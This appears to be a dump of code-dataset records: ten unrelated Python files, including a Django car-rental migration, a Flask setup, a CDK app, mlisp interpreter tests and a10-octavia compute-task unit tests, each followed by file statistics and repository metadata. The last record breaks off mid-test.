    def set_ctcBackupCnc(self, ctcBackupCnc):
        self.add_param('ctcBackupCnc', ctcBackupCnc)

    def get_domain(self):
        return self.get_params().get('domain')

    def set_domain(self, domain):
        self.add_param('domain', domain)

    def get_expectedBandwidth(self):
        return self.get_params().get('expectedBandwidth')

    def set_expectedBandwidth(self, expectedBandwidth):
        self.add_param('expectedBandwidth', expectedBandwidth)

    def get_haveDynamicResource(self):
        return self.get_params().get('haveDynamicResource')

    def set_haveDynamicResource(self, haveDynamicResource):
        self.add_param('haveDynamicResource', haveDynamicResource)

    def get_httpsCrt(self):
        return self.get_params().get('httpsCrt')

    def set_httpsCrt(self, httpsCrt):
        self.add_param('httpsCrt', httpsCrt)

    def get_httpsKey(self):
        return self.get_params().get('httpsKey')

    def set_httpsKey(self, httpsKey):
        self.add_param('httpsKey', httpsKey)

    def get_remark(self):
        return self.get_params().get('remark')

    def set_remark(self, remark):
        self.add_param('remark', remark)

    def get_schemeMode(self):
        return self.get_params().get('schemeMode')

    def set_schemeMode(self, schemeMode):
        self.add_param('schemeMode', schemeMode)

    def get_src(self):
        return self.get_params().get('src')

    def set_src(self, src):
        self.add_param('src', src)

    def get_srcMethod(self):
        return self.get_params().get('srcMethod')

    def set_srcMethod(self, srcMethod):
        self.add_param('srcMethod', srcMethod)

    def get_testUrl(self):
        return self.get_params().get('testUrl')

    def set_testUrl(self, testUrl):
        self.add_param('testUrl', testUrl)

    def get_type(self):
        return self.get_params().get('type')

    # NOTE: parameter name 'type' shadows the builtin; kept because the
    # method signature is public API (keyword callers rely on it).
    def set_type(self, type):
        self.add_param('type', type)
| 28.212766 | 71 | 0.673454 | 305 | 2,652 | 5.645902 | 0.127869 | 0.04878 | 0.113821 | 0.138211 | 0.211382 | 0.211382 | 0 | 0 | 0 | 0 | 0 | 0.000945 | 0.202112 | 2,652 | 93 | 72 | 28.516129 | 0.812854 | 0.007919 | 0 | 0 | 0 | 0 | 0.118676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.47541 | false | 0 | 0.016393 | 0.229508 | 0.737705 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
fa038dd03b1d28515952556d3c3ab0b0bb51b2fb | 229 | py | Python | evennia/scripts/__init__.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,544 | 2015-01-01T22:16:31.000Z | 2022-03-31T19:17:45.000Z | evennia/scripts/__init__.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,686 | 2015-01-02T18:26:31.000Z | 2022-03-31T20:12:03.000Z | evennia/scripts/__init__.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 867 | 2015-01-02T21:01:54.000Z | 2022-03-29T00:28:27.000Z | """
This sub-package holds the Scripts system. Scripts are database
entities that can store data both in connection to Objects and Accounts
or globally. They may also have a timer-component to execute various
timed effects.
"""
| 28.625 | 71 | 0.790393 | 36 | 229 | 5.027778 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161572 | 229 | 7 | 72 | 32.714286 | 0.942708 | 0.956332 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
fa2bb53c12a588d29d43ef76a7170a5b55b0cd87 | 99 | py | Python | year calendar.py | jeettilva/python | 9e0fb551d42d4b9de773526338df14dba161e9ac | [
"MIT"
] | null | null | null | year calendar.py | jeettilva/python | 9e0fb551d42d4b9de773526338df14dba161e9ac | [
"MIT"
] | null | null | null | year calendar.py | jeettilva/python | 9e0fb551d42d4b9de773526338df14dba161e9ac | [
"MIT"
] | null | null | null | import calendar
# Prompt for a year and print its full twelve-month text calendar.
year = int(input("Enter Year: "))
print(calendar.calendar(year))
| 19.8 | 32 | 0.747475 | 13 | 99 | 5.692308 | 0.615385 | 0.324324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 99 | 4 | 33 | 24.75 | 0.840909 | 0 | 0 | 0 | 0 | 0 | 0.126316 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
fa38201582ef2a31b32936a30e7d0ddfc7dab3bd | 119 | py | Python | test.py | Andersonlima1/allflix0 | 9403c0a2995bf9930daa795b12aafc527fcf895b | [
"MIT"
] | null | null | null | test.py | Andersonlima1/allflix0 | 9403c0a2995bf9930daa795b12aafc527fcf895b | [
"MIT"
] | 2 | 2021-03-11T04:07:09.000Z | 2022-02-27T09:28:21.000Z | test.py | Andersonlima1/allflix0 | 9403c0a2995bf9930daa795b12aafc527fcf895b | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# Plot y = sin(x) over one full period, [0, 2*pi].
theta = np.linspace(0, 2 * np.pi)
plt.plot(theta, np.sin(theta))
plt.show()
| 13.222222 | 31 | 0.689076 | 26 | 119 | 3.153846 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.151261 | 119 | 8 | 32 | 14.875 | 0.792079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3aff9c27dea9b20fa0008ede185890ed6a920bed | 347 | py | Python | aspen/simplates/renderers/stdlib_format.py | galuszkak/aspen.py | a29047d6d4eefa47413e35a18068946424898364 | [
"MIT"
] | null | null | null | aspen/simplates/renderers/stdlib_format.py | galuszkak/aspen.py | a29047d6d4eefa47413e35a18068946424898364 | [
"MIT"
] | null | null | null | aspen/simplates/renderers/stdlib_format.py | galuszkak/aspen.py | a29047d6d4eefa47413e35a18068946424898364 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from . import Renderer, Factory
class Renderer(Renderer):
    """Simplate renderer backed by ``str.format``."""

    def render_content(self, context):
        # Expand the compiled template with the page context as keyword
        # arguments (self.compiled is presumably prepared by the base
        # class — not visible here).
        return self.compiled.format(**context)
class Factory(Factory):
    """Factory that publishes this module's ``str.format`` renderer."""

    # Point the base factory at the renderer class defined above.
    Renderer = Renderer
| 20.411765 | 46 | 0.786744 | 41 | 347 | 6.170732 | 0.487805 | 0.158103 | 0.252964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158501 | 347 | 16 | 47 | 21.6875 | 0.866438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.5 | 0.1 | 1 | 0.1 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
d70cdf1b3fd5dbaacf3bf1557ab2f5ac8f345357 | 186 | py | Python | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/objects.py | cuongnb14/cookiecutter-flask-restful | d2da71f192db626370ae702c358eadaf1bbc905a | [
"MIT"
] | 2 | 2017-10-24T16:01:57.000Z | 2017-11-15T18:34:41.000Z | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/objects.py | cuongnb14/cookiecutter-flask-restful | d2da71f192db626370ae702c358eadaf1bbc905a | [
"MIT"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/objects.py | cuongnb14/cookiecutter-flask-restful | d2da71f192db626370ae702c358eadaf1bbc905a | [
"MIT"
] | null | null | null | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# Application object for the generated project; the placeholder is rendered
# to the real project slug by cookiecutter at generation time.
app = Flask("{{cookiecutter.project_slug}}")
# Load settings from the on-disk config module (path relative to app root).
app.config.from_pyfile('configs/config.py')
# Initialise the SQLAlchemy extension bound to this application.
db = SQLAlchemy(app)
| 20.666667 | 44 | 0.774194 | 26 | 186 | 5.423077 | 0.538462 | 0.12766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107527 | 186 | 8 | 45 | 23.25 | 0.849398 | 0.037634 | 0 | 0 | 0 | 0 | 0.259887 | 0.163842 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d70dbb086c453cdfe83adaf8ebde0a689fb10df9 | 209 | py | Python | asg_alb_webservers/app.py | darko-mesaros/awsome_building_in_the_cloud_demos | baff18904bb87d74fa13bcf1ef926dbe4f361da6 | [
"MIT"
] | 2 | 2020-09-16T08:20:34.000Z | 2020-09-16T09:19:22.000Z | asg_alb_webservers/app.py | darko-mesaros/awsome_building_in_the_cloud_demos | baff18904bb87d74fa13bcf1ef926dbe4f361da6 | [
"MIT"
] | null | null | null | asg_alb_webservers/app.py | darko-mesaros/awsome_building_in_the_cloud_demos | baff18904bb87d74fa13bcf1ef926dbe4f361da6 | [
"MIT"
] | 1 | 2021-05-23T04:32:38.000Z | 2021-05-23T04:32:38.000Z | #!/usr/bin/env python3
from aws_cdk import core
from asg_alb_webservers.asg_alb_webservers_stack import AsgAlbWebserversStack
# Create the CDK application, register the ASG/ALB web-servers stack under a
# fixed construct id, then synthesize the CloudFormation template(s).
app = core.App()
AsgAlbWebserversStack(app, "asg-alb-webservers")
app.synth()
| 17.416667 | 77 | 0.803828 | 29 | 209 | 5.586207 | 0.551724 | 0.111111 | 0.296296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005319 | 0.100478 | 209 | 11 | 78 | 19 | 0.856383 | 0.100478 | 0 | 0 | 0 | 0 | 0.096257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d7163abb8cab8d97f9dd68760c6b806b28f3c2cd | 4,284 | py | Python | src/accounts/migrations/0001_initial.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0001_initial.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0001_initial.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-10-17 12:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Car',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
('model_year', models.CharField(max_length=100, null=True)),
('description', models.CharField(blank=True, max_length=100, null=True)),
('date_created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category_name', models.CharField(max_length=100, null=True)),
('price_per_day', models.FloatField(max_length=10, null=True)),
('occupant_amount', models.CharField(max_length=100, null=True)),
('baggage_amount', models.CharField(max_length=100, null=True)),
('driver_age', models.FloatField(max_length=10, null=True)),
('Power', models.FloatField(max_length=10, null=True)),
('door_amount', models.FloatField(max_length=10, null=True)),
('acriss_code', models.CharField(max_length=100, null=True)),
],
),
migrations.CreateModel(
name='City',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
],
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
('phone', models.CharField(max_length=100, null=True)),
('email', models.CharField(max_length=100, null=True)),
('date_created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Station',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accounts.city')),
],
),
migrations.CreateModel(
name='Reservation',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pickup_date', models.DateTimeField(null=True)),
('dropoff_date', models.DateTimeField(null=True)),
('car', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.car')),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pickup_city', to='accounts.city')),
('city1', models.ForeignKey(default='---------', on_delete=django.db.models.deletion.CASCADE, related_name='return_city', to='accounts.city')),
('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.customer')),
('station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pickup_station', to='accounts.station')),
('station1', models.ForeignKey(default='---------', on_delete=django.db.models.deletion.CASCADE, related_name='return_station', to='accounts.station')),
],
),
migrations.AddField(
model_name='car',
name='category',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.category'),
),
]
| 51 | 168 | 0.593137 | 450 | 4,284 | 5.488889 | 0.186667 | 0.068016 | 0.0583 | 0.077733 | 0.763968 | 0.738866 | 0.738866 | 0.647773 | 0.598785 | 0.598785 | 0 | 0.019152 | 0.256536 | 4,284 | 83 | 169 | 51.614458 | 0.756358 | 0.010504 | 0 | 0.486842 | 1 | 0 | 0.114704 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026316 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d72199c88ef266c08f124bdd5c04dca01a9f2791 | 172 | py | Python | tests/test_referenceless.py | notricenotsweet/GEM-metrics | 10d689891558862593cdf3ad56656bbbb6249cb8 | [
"MIT"
] | 1 | 2021-04-18T22:09:34.000Z | 2021-04-18T22:09:34.000Z | tests/test_referenceless.py | maybay21/GEM-metrics | 2693f3439547a40897bc30c2ab70e27e992883c0 | [
"MIT"
] | null | null | null | tests/test_referenceless.py | maybay21/GEM-metrics | 2693f3439547a40897bc30c2ab70e27e992883c0 | [
"MIT"
] | 1 | 2021-07-11T18:18:35.000Z | 2021-07-11T18:18:35.000Z | """Test class for metrics that don't use a reference.
"""
import unittest
class TestReferenceLessMetric(object):
    """Placeholder for reference-less metric tests; intentionally empty."""
if __name__ == '__main__':
    # Run this module's tests when executed directly.
    unittest.main()
| 15.636364 | 53 | 0.709302 | 21 | 172 | 5.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180233 | 172 | 10 | 54 | 17.2 | 0.808511 | 0.290698 | 0 | 0 | 0 | 0 | 0.069565 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
d72aeb24042579690a699fc8349cabbb11bc4187 | 1,200 | py | Python | tests/test_variables.py | msiemens/mlisp | c6d3d3593dbd1dfb53d07a35f85a67e5bafab71a | [
"Unlicense",
"MIT"
] | 2 | 2015-07-05T04:46:13.000Z | 2020-01-08T23:23:22.000Z | tests/test_variables.py | msiemens/mlisp | c6d3d3593dbd1dfb53d07a35f85a67e5bafab71a | [
"Unlicense",
"MIT"
] | null | null | null | tests/test_variables.py | msiemens/mlisp | c6d3d3593dbd1dfb53d07a35f85a67e5bafab71a | [
"Unlicense",
"MIT"
] | null | null | null | from testhelpers import *
# Build the interpreter environment once at import time (from testhelpers).
init()
# Names the interpreter is expected to provide as builtins.
# NOTE(review): unused in this chunk — presumably consumed elsewhere; verify.
mlisp_builtins = ["+", "-", "*", "/", "%", "head", "tail", "list",
"eval", "join", "cons", "def", "=", "lambda"]
def test_qexpr():
    """Q-expression literals: empty and populated forms evaluate to themselves."""
    with run('{}') as result:
        assert is_qexpr(result) and is_empty(result)
    with run('{1 2 3}') as result:
        assert is_qexpr(result)
        assert str(result) == '{1 2 3}'
        # Elements should be the numbers 1..3, in order.
        for index, value in enumerate(result.values):
            assert is_number(value, index + 1)
def test_define():
    """`def` binds a symbol; evaluating the symbol yields the bound value."""
    with run('def {x} 100') as result:
        assert is_sexpr(result)
    with run('x') as result:
        assert is_number(result, 100)
def test_unbound():
    """Evaluating an unbound symbol reports an error."""
    with run('y') as result:
        assert is_error(result, 'Unbound symbol: \'y\'')
def test_misc():
    """Assorted builtin behaviour: eval/head, multi-binding def, list."""
    # head of a q-expression yields the first symbol; eval resolves it.
    with run('eval (head {+ - + - * /})') as result:
        assert is_func(result, lib.builtin_add)
    # def can bind several symbols at once.
    with run('def {a b} 5 6') as result:
        assert is_sexpr(result)
    with run('+ a b') as result:
        assert is_number(result, 11)
    # Bind a q-expression of symbols to a name...
    with run('def {arglist} {a b}') as result:
        assert is_sexpr(result)
    # ...then def through it to rebind a and b.
    with run('def arglist 1 2') as result:
        assert is_sexpr(result)
    with run('list a b') as result:
        assert is_qexpr(result)
        assert is_int_list(result, [1, 2])
reset_env() # FIXME: Sometimes sigsegv?? | 20.338983 | 66 | 0.508333 | 185 | 1,200 | 3.178378 | 0.324324 | 0.154762 | 0.183673 | 0.205782 | 0.341837 | 0.341837 | 0.241497 | 0.163265 | 0 | 0 | 0 | 0.025579 | 0.315833 | 1,200 | 59 | 67 | 20.338983 | 0.690621 | 0.021667 | 0 | 0.171429 | 0 | 0 | 0.145299 | 0 | 0 | 0 | 0 | 0.016949 | 0.4 | 1 | 0.114286 | false | 0 | 0.028571 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d7430eef0f290e439183c27c713425a89bbd8241 | 11,131 | py | Python | a10_octavia/tests/unit/controller/worker/tasks/test_a10_compute_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 5 | 2020-03-10T16:48:55.000Z | 2021-09-18T00:57:58.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_a10_compute_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 72 | 2019-08-10T01:16:59.000Z | 2021-12-13T08:20:36.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_a10_compute_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 27 | 2019-08-11T19:26:52.000Z | 2021-07-21T09:08:58.000Z | # Copyright 2020, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import imp
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from octavia.common import constants as o_constants
from octavia.common import data_models as o_data_models
from octavia.tests.common import constants as o_test_constants
from a10_octavia.common import config_options
from a10_octavia.common import data_models
from a10_octavia.controller.worker.tasks import a10_compute_tasks as task
from a10_octavia.tests.common import a10constants
from a10_octavia.tests.unit import base
# Shared fixtures for the tests below: a bare amphora, a vthunder tied to the
# mock compute id, and a load balancer whose VIP sits on the mock VIP network.
AMPHORA = o_data_models.Amphora(id=a10constants.MOCK_AMPHORA_ID)
# NOTE(review): VTHUNDER is unused in this chunk — verify it is needed.
VTHUNDER = data_models.VThunder(compute_id=a10constants.MOCK_COMPUTE_ID)
VIP = o_data_models.Vip(ip_address="1.1.1.1", network_id=o_test_constants.MOCK_VIP_NET_ID)
LB = o_data_models.LoadBalancer(
id=a10constants.MOCK_LOAD_BALANCER_ID, vip=VIP)
class TestA10ComputeTasks(base.BaseTaskTestCase):
def setUp(self):
    """Register GLM license options and patch out DB session access."""
    super(TestA10ComputeTasks, self).setUp()
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    self.conf.register_opts(config_options.A10_GLM_LICENSE_OPTS,
                            group=a10constants.A10_GLOBAL_CONF_SECTION)
    # Reload so the task module picks up the options registered above.
    imp.reload(task)
    self.client_mock = mock.Mock()
    # Patch DB session acquisition so tests never touch a real database.
    self.db_session = mock.patch(
        'a10_octavia.controller.worker.tasks.a10_database_tasks.db_apis.get_session')
    self.db_session.start()
def tearDown(self):
    """Undo per-test fixtures: config overrides and the DB-session patch."""
    super(TestA10ComputeTasks, self).tearDown()
    self.conf.reset()
    # Fix: stop the patcher started in setUp. Previously it was never
    # stopped, so the get_session patch leaked into later tests.
    self.db_session.stop()
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_no_nets(self, mock_driver):
    """With nothing configured, build() receives an empty network list."""
    create_task = task.ComputeCreate()
    create_task.compute = mock.MagicMock()
    create_task.execute(AMPHORA.id)
    _, build_kwargs = create_task.compute.build.call_args
    self.assertEqual(build_kwargs.get('network_ids'), [])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_only(self, mock_driver):
    """A lone management network is forwarded to build() as-is."""
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_mgmt_network=a10constants.MOCK_NETWORK_ID)
    create_task = task.ComputeCreate()
    create_task.compute = mock.MagicMock()
    create_task.execute(AMPHORA.id)
    _, build_kwargs = create_task.compute.build.call_args
    self.assertEqual(build_kwargs.get('network_ids'),
                     [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_boot_only(self, mock_driver):
    """All boot networks are passed to build(); order is not asserted."""
    boot_nets = [a10constants.MOCK_NETWORK_ID, 'mock-network-id-2']
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_boot_network_list=boot_nets)
    create_task = task.ComputeCreate()
    create_task.compute = mock.MagicMock()
    create_task.execute(AMPHORA.id)
    _, build_kwargs = create_task.compute.build.call_args
    passed_nets = build_kwargs.get('network_ids')
    self.assertEqual(set(boot_nets), set(passed_nets))
    self.assertEqual(len(boot_nets), len(passed_nets))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_glm_only(self, mock_driver):
    """A lone GLM license network is forwarded to build()."""
    self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
                     amp_license_network=a10constants.MOCK_NETWORK_ID)
    create_task = task.ComputeCreate()
    create_task.compute.build = mock.MagicMock()
    create_task.execute(AMPHORA.id)
    _, build_kwargs = create_task.compute.build.call_args
    self.assertEqual(build_kwargs.get('network_ids'),
                     [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_lb_only(self, mock_driver):
    """Only the load balancer's VIP network is passed when nothing else is set."""
    create_task = task.ComputeCreate()
    create_task.compute.build = mock.MagicMock()
    create_task.execute(AMPHORA.id, loadbalancer=LB)
    _, build_kwargs = create_task.compute.build.call_args
    self.assertEqual(build_kwargs.get('network_ids'), [VIP.network_id])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_is_glm(self, mock_driver):
    """Mgmt and license networks that coincide appear only once."""
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_mgmt_network=a10constants.MOCK_NETWORK_ID)
    self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
                     amp_license_network=a10constants.MOCK_NETWORK_ID)
    create_task = task.ComputeCreate()
    create_task.compute.build = mock.MagicMock()
    create_task.execute(AMPHORA.id)
    _, build_kwargs = create_task.compute.build.call_args
    self.assertEqual(build_kwargs.get('network_ids'),
                     [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_is_first_boot(self, mock_driver):
    """When the mgmt net already heads the boot list, that order is kept."""
    mgmt_net = a10constants.MOCK_NETWORK_ID
    boot_nets = [mgmt_net, 'mock-network-id-2']
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_mgmt_network=mgmt_net,
                     amp_boot_network_list=boot_nets)
    create_task = task.ComputeCreate()
    create_task.compute = mock.MagicMock()
    create_task.execute(AMPHORA.id)
    _, build_kwargs = create_task.compute.build.call_args
    self.assertEqual(build_kwargs.get('network_ids'), boot_nets)
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_is_lb(self, mock_driver):
    """A VIP network equal to the mgmt network appears only once."""
    # Deep-copy so the shared LB fixture is not mutated for other tests.
    lb_copy = copy.deepcopy(LB)
    lb_copy.vip.network_id = a10constants.MOCK_NETWORK_ID
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_mgmt_network=a10constants.MOCK_NETWORK_ID)
    create_task = task.ComputeCreate()
    create_task.compute.build = mock.MagicMock()
    create_task.execute(AMPHORA.id, loadbalancer=lb_copy)
    _, build_kwargs = create_task.compute.build.call_args
    self.assertEqual(build_kwargs.get('network_ids'),
                     [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_glm_in_boot(self, mock_driver):
    """A license net already in the boot list is not added a second time."""
    boot_nets = ['mock-mgmt-net-id', a10constants.MOCK_NETWORK_ID]
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_boot_network_list=boot_nets)
    self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
                     amp_license_network=a10constants.MOCK_NETWORK_ID)
    create_task = task.ComputeCreate()
    create_task.compute = mock.MagicMock()
    create_task.execute(AMPHORA.id)
    _, build_kwargs = create_task.compute.build.call_args
    passed_nets = build_kwargs.get('network_ids')
    self.assertIn(a10constants.MOCK_NETWORK_ID, passed_nets)
    self.assertEqual(len(passed_nets), len(boot_nets))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_net_list_no_diff(self, mock_driver):
    """An explicit network_list already covering every configured net is
    used as-is, with the management network first."""
    mgmt_net = 'mock-mgmt-net-id'
    license_net = 'mock-mock-license-net-id'
    boot_nets = ['mock-data-net-id-1']
    requested_nets = [mgmt_net, boot_nets[0], LB.vip.network_id, license_net]
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_mgmt_network=mgmt_net,
                     amp_boot_network_list=boot_nets)
